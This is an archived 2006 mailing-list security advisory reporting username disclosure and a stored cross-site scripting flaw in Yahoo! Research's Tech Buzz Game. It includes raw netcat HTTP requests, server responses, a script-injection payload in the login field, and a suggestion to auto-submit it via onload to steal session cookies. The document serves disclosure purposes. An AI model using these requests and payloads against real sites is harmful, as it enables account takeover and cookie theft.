| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 17 Aug 2006 23:01:08 -0000 (GMT)
From: simo@...x.org
To: full-disclosure@...ts.grok.org.uk,
bugtraq@...urityfocus.com
Cc:
Subject: Yahoo! Research Multiple vulnerabilites
Title: Yahoo! Research Multiple vulnerabilites
Authors: Simo64 and Simo Ben youssef
Contacts : <simo64_at_morx_org> / <simo_at_morx_org>
Discovered: 02 Aout 2006
Published: 17 Aout 2006
MorX Security Research Team
Original Advisory:
http://www.morx.org/YahooResearchMultiple.txt
http://www.morx.org
Service/Product: The Tech Buzz Game
Vendors: Yahoo! Research and O'Reilly Media
Vulnerability: Cross Site Scripting / Users Information Disclosure
Severity: Law/Medium
Tested on: Microsoft IE 6.0 firefox 1.5 and Opera
(should work on all browsers)
Description:
The Tech Buzz Game is a fledgling research project and demo, rather than a
full-fledged Yahoo! product, and it's a product of Yahoo! Research and
O'Reilly Media. The marketplace software is powered by Newsfutures. Buzz
scores are powered by Yahoo! Search technology and Yahoo! Search Web
Services. The buzz scoring methodology was originally developed for the
Yahoo! Buzz Index, which tracks web search spikes and trends
for more details, visit:
http://buzz.research.yahoo.com/dm/info/about.html
Details:
1- Usernames disclosure
the login2.html script is writting in a way to store users error
information in login.html. if a user fails to sign in to the game, the
error returned by login2.html with the username will be stored in
login.html. login.html assign each request with an EID numerical value, in
fact those information are accessible to anyone thru HTTP
from login.htm source code
<td valign="top" align="center" >
<form action=hlogin2.html method=post>
<input type=hidden name=cmd value=Domain.login>
<input type=hidden name=error.page value=login.html> <--- stores
informations back in login.html
Example:
C:\>nc buzz.research.yahoo.com 80
GET /dm/login/login.html?eid=100 HTTP/1.1
Host: 127.0.0.1
Connection: Closed
HTTP/1.1 200 OK
Date: Thu, 17 Aug 2006 14:40:46 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7
Transfer-Encoding: chunked
Content-Type: text/html
1d84
--------------------- Scroll down ------------------------
<td align="left" scope="col">Username:</td>
<td align="left" scope="col"><input type="text" name="login"
value='wil*******' /></td> <--- a previously stored yahoo ID
<td class="error" align="left" scope="col"></td>
PoC:
http://buzz.research.yahoo.com/dm/login/login.html?eid=[some-random-numbers]
2- Permanent Cross Site Scripting:
login2.html doesnt only store informations and make them accessible
publicly thru login.html but also it fails to properly sanitize
user-supplied input when passed thru the variable "login". after
successful script injection the input will be stored in login.html with a
specific EID
example:
C:\>nc buzz.research.yahoo.com 80
POST /dm/login/login2.html HTTP/1.1
Host: 127.0.0.1
Content-Length: 78
Connection: Closed
cmd=Domain.login&error.page=login.html&login=''><script>alert("a")</script>&pw=a
HTTP/1.1 302 Found
Date: Thu, 17 Aug 2006 15:10:47 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7a
Location: /dm/login/login.html?eid=182
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
120
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="/dm/login/login.html?eid=182">here</A>.<P>
<HR>
ok now lets get login.html?eid=182 to see if our script was filtered or no
C:\>nc buzz.research.yahoo.com 80
GET /dm/login/login.html?eid=182 HTTP/1.1
Host: 127.0.0.1
Connection: Closed
HTTP/1.1 200 OK
Date: Thu, 17 Aug 2006 13:14:18 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7a
Transfer-Encoding: chunked
Content-Type: text/html
1d98
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
--------------------------Scroll Down ------------------------
Sorry, login failed.</td>
</tr>
<tr>
<td scope="col" align="left" colspan="4"> </td>
</tr>
<tr>
<td scope="col" align="left"> </td>
<td align="left" scope="col">Username:</td>
<td align="left" scope="col"><input type="text" name="login"
value='''><script>alert("a")</script>' /></td> <--- not filtred
PoC:
http://www.morx.org/yahooXSSinject.html
Note: the form will need the user to click to submit, an attacker may use
a form which will auto-submit the js, using for example the onload
attribute
Impact:
an attacker can exploit the vulnerable script to have arbitrary script
code executed in the browser of an authentified yahoo user in the context
of the vulnerable yahoo website. resulting in the theft of cookie-based
authentication giving the attacker full access to the victim's accounts
(email box, etc) as well as other type of attacks.
workaround:
avoid clicking on links while being signed in yahoo
Disclaimer:
this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/Account. I cannot be held responsible for
any of the above.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists